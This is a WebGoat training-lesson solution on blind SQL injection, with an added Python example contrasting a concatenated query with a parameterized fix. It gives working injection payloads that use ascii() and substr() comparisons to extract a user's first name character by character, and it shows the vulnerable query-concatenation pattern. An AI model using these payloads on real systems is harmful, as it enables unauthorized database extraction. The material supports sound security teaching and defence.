Lesson Plan Title: How to Perform Blind SQL Injection
Concept / Topic To Teach:
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
Not only is it a threat easily instigated, it is also a threat that, with a little common sense and forethought, can be almost totally prevented. This lesson will show the student several examples of SQL injection.
It is always good practice to sanitize all input data, especially data that will be used in OS commands, scripts, and database queries.
General Goal(s):
The user should be able to view all records in the specified table. The user could add new records or modify existing records.
From the hints:
Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. Create a SQL statement that you can use as a true/false test, then select the first character of the target element and start narrowing down the character using > and <.
The backend database is HSQLDB. Keep that in mind if you research SQL functions on the Internet, since different databases use different functions and syntax.
This is the code for the query being built and issued by WebGoat:
"SELECT * FROM user_data WHERE userid = " + accountNumber
The application is taking your input and inserting it at the end of a pre-formed SQL command. You will need to make use of the following SQL functions:
SELECT - query for your target data and get a string
substr(string, start, length) - returns a substring of string starting at the start character and going for length characters
ascii(string) - returns the ascii value of the first character in string
> and < - once you have a character's value, compare it to a chosen one
Example: is the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 );
If you get back that the account number is valid, then yes. If you get back that the number is invalid, then the answer is no.
Another example: is the second character of the first_name of userid 15613 greater than 'm' (ascii 109)?
101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109 );
If you get back that the account number is valid, then yes. If you get back that the number is invalid, then the answer is no.
Figure 1 Lesson 16
For the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 ); you will get an "Account number is valid" message. If the character is bigger than the value, you get an invalid account error message.
Figure 2 Invalid account number
You can change the < to = to make sure that you have the correct value. This results in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) = 74 );
Figure 3 First character
So you know that ascii(74) is capital J. Now do the same for the second and all other characters.
The query for the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) = 111 ); Ascii(111) = o, so you now have Jo.
For the third character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e
For the fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s
For the fifth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 5 , 1) ) = 112 ); Ascii(112) = p
For the sixth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613) , 6 , 1) ) = 104 ); Ascii(104) = h
So the name that you found is Joesph. Enter this in the text field to complete this lesson.
Figure 4 Enter the name Joesph
Figure 5 Lesson 16 Completed
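The lookup seen from the defender's side, as an added example that is not part of the lesson or of WebGoat's own code: an in-memory sqlite3 table stands in for HSQLDB (assumption: sqlite3 has no ascii(), so its unicode() takes that role, and the rows are constructed), the lesson's own probes are run through the concatenated query to show the true/false oracle, and a validated, parameterized lookup shows the same probes no longer answering anything.

```python
import sqlite3

# Constructed stand-in for WebGoat's HSQLDB user_data table, using sqlite3 so this
# runs offline. Assumption: sqlite3 has no ascii(), so unicode() is used instead.
SAMPLE_ROWS = [
    (101, "Joe", "Snow"),            # the account number the lesson submits (constructed row)
    (15613, "Joesph", "Something"),  # the row the lesson targets; surname is made up
]

# The lesson's own probes, with ascii() renamed for sqlite3.
PROBE_FIRST_LT_77 = ("101 AND (unicode(substr((SELECT first_name FROM user_data "
                     "WHERE userid=15613), 1, 1)) < 77)")
PROBE_FIRST_EQ_74 = ("101 AND (unicode(substr((SELECT first_name FROM user_data "
                     "WHERE userid=15613), 1, 1)) = 74)")
PROBE_SECOND_GT_109 = ("101 AND (unicode(substr((SELECT first_name FROM user_data "
                       "WHERE userid=15613), 2, 1)) > 109)")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, account_number):
    """The lesson's pattern: untrusted input appended to the SQL text.

    True means "Account number is valid", False means the invalid message,
    so whatever true/false test the input carries leaks straight back."""
    sql = "SELECT * FROM user_data WHERE userid = " + account_number
    return conn.execute(sql).fetchall() != []


def lookup_fixed(conn, account_number):
    """Hardened lookup: reject anything that is not a plain integer, then bind
    the value as a parameter so it can never become part of the SQL grammar."""
    if not account_number.strip().isdigit():
        return False
    rows = conn.execute("SELECT * FROM user_data WHERE userid = ?",
                        (int(account_number),)).fetchall()
    return rows != []


if __name__ == "__main__":
    db = make_db()
    for probe in (PROBE_FIRST_LT_77, PROBE_FIRST_EQ_74, PROBE_SECOND_GT_109):
        print("vulnerable:", lookup_vulnerable(db, probe), " fixed:", lookup_fixed(db, probe))
```

With the concatenated query each probe answers true, which is exactly the oracle the lesson walks through; with the validated, bound query every probe is refused before it reaches the database.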
Solution by Erwin Geirnaert